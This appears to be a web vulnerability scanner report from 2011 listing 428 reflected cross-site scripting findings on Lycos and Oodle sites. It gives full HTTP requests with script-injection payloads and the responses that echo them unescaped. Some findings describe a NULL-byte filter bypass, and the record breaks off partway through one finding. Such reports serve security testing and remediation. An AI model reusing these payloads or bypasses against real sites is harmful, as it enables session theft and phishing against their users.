1.348. http://www.lycos.com.co/ [utm_campaign parameter]

1.349. http://www.lycos.com.co/ [utm_medium parameter]

1.350. http://www.lycos.com.co/ [utm_source parameter]

1.351. http://www.lycos.com.mx/ [name of an arbitrarily supplied request parameter]

1.352. http://www.lycos.com.mx/ [utm_campaign parameter]

1.353. http://www.lycos.com.mx/ [utm_medium parameter]

1.354. http://www.lycos.com.mx/ [utm_source parameter]

1.355. http://www.lycos.com.pe/ [name of an arbitrarily supplied request parameter]

1.356. http://www.lycos.com.pe/ [utm_campaign parameter]

1.357. http://www.lycos.com.pe/ [utm_medium parameter]

1.358. http://www.lycos.com.pe/ [utm_source parameter]

1.359. http://www.lycos.com.ve/ [name of an arbitrarily supplied request parameter]

1.360. http://www.lycos.com.ve/ [utm_campaign parameter]

1.361. http://www.lycos.com.ve/ [utm_medium parameter]

1.362. http://www.lycos.com.ve/ [utm_source parameter]

1.363. http://www.lycos.de/ [name of an arbitrarily supplied request parameter]

1.364. http://www.lycos.de/ [utm_campaign parameter]

1.365. http://www.lycos.de/ [utm_medium parameter]

1.366. http://www.lycos.de/ [utm_source parameter]

1.367. http://www.lycos.dk/ [name of an arbitrarily supplied request parameter]

1.368. http://www.lycos.dk/ [utm_campaign parameter]

1.369. http://www.lycos.dk/ [utm_medium parameter]

1.370. http://www.lycos.dk/ [utm_source parameter]

1.371. http://www.lycos.es/ [name of an arbitrarily supplied request parameter]

1.372. http://www.lycos.es/ [utm_campaign parameter]

1.373. http://www.lycos.es/ [utm_medium parameter]

1.374. http://www.lycos.es/ [utm_source parameter]

1.375. http://www.lycos.fi/ [name of an arbitrarily supplied request parameter]

1.376. http://www.lycos.fi/ [utm_campaign parameter]

1.377. http://www.lycos.fi/ [utm_medium parameter]

1.378. http://www.lycos.fi/ [utm_source parameter]

1.379. http://www.lycos.fr/ [name of an arbitrarily supplied request parameter]

1.380. http://www.lycos.fr/ [utm_campaign parameter]

1.381. http://www.lycos.fr/ [utm_medium parameter]

1.382. http://www.lycos.fr/ [utm_source parameter]

1.383. http://www.lycos.in/ [name of an arbitrarily supplied request parameter]

1.384. http://www.lycos.in/ [utm_campaign parameter]

1.385. http://www.lycos.in/ [utm_medium parameter]

1.386. http://www.lycos.in/ [utm_source parameter]

1.387. http://www.lycos.it/ [name of an arbitrarily supplied request parameter]

1.388. http://www.lycos.it/ [utm_campaign parameter]

1.389. http://www.lycos.it/ [utm_medium parameter]

1.390. http://www.lycos.it/ [utm_source parameter]

1.391. http://www.lycos.nl/ [name of an arbitrarily supplied request parameter]

1.392. http://www.lycos.nl/ [utm_campaign parameter]

1.393. http://www.lycos.nl/ [utm_medium parameter]

1.394. http://www.lycos.nl/ [utm_source parameter]

1.395. http://www.lycos.se/ [name of an arbitrarily supplied request parameter]

1.396. http://www.lycos.se/ [utm_campaign parameter]

1.397. http://www.lycos.se/ [utm_medium parameter]

1.398. http://www.lycos.se/ [utm_source parameter]

1.399. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]

1.400. http://www.oodle.com/ [name of an arbitrarily supplied request parameter]

1.401. http://www.oodle.com/info/safety/ [REST URL parameter 1]

1.402. http://www.oodle.com/info/safety/ [REST URL parameter 1]

1.403. http://www.oodle.com/info/safety/ [name of an arbitrarily supplied request parameter]

1.404. http://www.oodle.com/info/safety/ [name of an arbitrarily supplied request parameter]

1.405. http://www.oodle.com/info/safety_scams/ [REST URL parameter 1]

1.406. http://www.oodle.com/info/safety_scams/ [REST URL parameter 1]

1.407. http://www.oodle.com/info/safety_scams/ [name of an arbitrarily supplied request parameter]

1.408. http://www.oodle.com/info/safety_scams/ [name of an arbitrarily supplied request parameter]

1.409. http://jobs.lycos.com/ [diktfc cookie]

1.410. http://jobs.lycos.com/ [diktfc cookie]

1.411. http://jobs.lycos.com/advanced-search [diktfc cookie]

1.412. http://jobs.lycos.com/advanced-search [diktfc cookie]

1.413. http://jobs.lycos.com/bootstrap.js [diktfc cookie]

1.414. http://jobs.lycos.com/bootstrap.js [diktfc cookie]

1.415. http://jobs.lycos.com/browse [diktfc cookie]

1.416. http://jobs.lycos.com/browse [diktfc cookie]

1.417. http://jobs.lycos.com/jobs/post [diktfc cookie]

1.418. http://jobs.lycos.com/jobs/post [diktfc cookie]

1.419. http://jobs.lycos.com/search [diktfc cookie]

1.420. http://jobs.lycos.com/search [diktfc cookie]

1.421. http://peoplesearch.lycos.com/ [diktfc cookie]

1.422. http://peoplesearch.lycos.com/ [diktfc cookie]

1.423. http://peoplesearch.lycos.com/bootstrap.js [diktfc cookie]

1.424. http://peoplesearch.lycos.com/bootstrap.js [diktfc cookie]

1.425. http://peoplesearch.lycos.com/frontdoor [diktfc cookie]

1.426. http://peoplesearch.lycos.com/frontdoor [diktfc cookie]

1.427. http://peoplesearch.lycos.com/index.php [diktfc cookie]

1.428. http://peoplesearch.lycos.com/index.php [diktfc cookie]



1. Cross-site scripting (reflected)
There are 428 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://classifieds.lycos.ca/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.ca
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70c28"><script>alert(1)</script>6e5ce3e150c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?70c28"><script>alert(1)</script>6e5ce3e150c=1 HTTP/1.1
Host: classifieds.lycos.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:56:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:56:19 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/?70c28"><script>alert(1)</script>6e5ce3e150c=1&mobile=1" rel="nofollow">
...[SNIP]...

1.2. http://classifieds.lycos.co.nz/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.co.nz
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 692ef"><script>alert(1)</script>756250e2c36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?692ef"><script>alert(1)</script>756250e2c36=1 HTTP/1.1
Host: classifieds.lycos.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:56:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:56:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/?692ef"><script>alert(1)</script>756250e2c36=1&mobile=1" rel="nofollow">
...[SNIP]...

1.3. http://classifieds.lycos.co.uk/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.co.uk
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fd18"><script>alert(1)</script>d47af225d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3fd18"><script>alert(1)</script>d47af225d2=1 HTTP/1.1
Host: classifieds.lycos.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:56:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:56:15 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/?3fd18"><script>alert(1)</script>d47af225d2=1&mobile=1" rel="nofollow">
...[SNIP]...

1.4. http://classifieds.lycos.com/ [mobile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /

Issue detail

The value of the mobile request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65c1c"><script>alert(1)</script>34090552b4d was submitted in the mobile parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?mobile=165c1c"><script>alert(1)</script>34090552b4d HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:56:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:56:36 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/?mobile=165c1c"><script>alert(1)</script>34090552b4d&mobile=1" rel="nofollow">
...[SNIP]...

1.5. http://classifieds.lycos.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ea91"><script>alert(1)</script>1d982f7e555 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9ea91"><script>alert(1)</script>1d982f7e555=1 HTTP/1.1
Host: classifieds.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PENTA=173.193.214.243.1297090182456621; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; __utmc=207906063; __utmb=207906063.5.10.1297090205

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:50:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:50:51 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/?9ea91"><script>alert(1)</script>1d982f7e555=1&mobile=1" rel="nofollow">
...[SNIP]...

1.6. http://classifieds.lycos.com/ajax/submission.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /ajax/submission.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d8a00"><script>alert(1)</script>c770fb4825e was submitted in the REST URL parameter 1. This input was echoed as d8a00"><script>alert(1)</script>c770fb4825e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax%00d8a00"><script>alert(1)</script>c770fb4825e/submission.php HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:54:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:54:22 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/ajax%00d8a00"><script>alert(1)</script>c770fb4825e/submission.php?mobile=1" rel="nofollow">
...[SNIP]...

1.7. http://classifieds.lycos.com/ajax/submission.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /ajax/submission.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0046449"><script>alert(1)</script>2135f17cc50 was submitted in the REST URL parameter 2. This input was echoed as 46449"><script>alert(1)</script>2135f17cc50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax/submission.php%0046449"><script>alert(1)</script>2135f17cc50 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:55:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/ajax/submission.php%0046449"><script>alert(1)</script>2135f17cc50?mobile=1" rel="nofollow">
...[SNIP]...

1.8. http://classifieds.lycos.com/ajax/submission.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /ajax/submission.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0075d78"><script>alert(1)</script>3385c761fc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75d78"><script>alert(1)</script>3385c761fc4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax/submission.php/%0075d78"><script>alert(1)</script>3385c761fc4 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:20:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:22 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/ajax/submission.php/%0075d78"><script>alert(1)</script>3385c761fc4?mobile=1" rel="nofollow">
...[SNIP]...

1.9. http://classifieds.lycos.com/bootstrap.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /bootstrap.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 360d0"><script>alert(1)</script>c5396564657 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bootstrap.js360d0"><script>alert(1)</script>c5396564657 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:54:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:54:35 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/bootstrap.js360d0"><script>alert(1)</script>c5396564657?mobile=1" rel="nofollow">
...[SNIP]...

1.10. http://classifieds.lycos.com/browse/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /browse/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75633"><script>alert(1)</script>ba65cf1512 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /browse75633"><script>alert(1)</script>ba65cf1512/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:28 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/browse75633"><script>alert(1)</script>ba65cf1512/?mobile=1" rel="nofollow">
...[SNIP]...

1.11. http://classifieds.lycos.com/browse/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /browse/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8d82"><script>alert(1)</script>b3badc87833 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /browse/?e8d82"><script>alert(1)</script>b3badc87833=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:20:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:22 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15024


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/browse/?e8d82"><script>alert(1)</script>b3badc87833=1&mobile=1" rel="nofollow">
...[SNIP]...

1.12. http://classifieds.lycos.com/community-rideshare/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /community-rideshare/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd2ff"><script>alert(1)</script>01dce6dd8cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community-ridesharedd2ff"><script>alert(1)</script>01dce6dd8cf/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:32 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17712

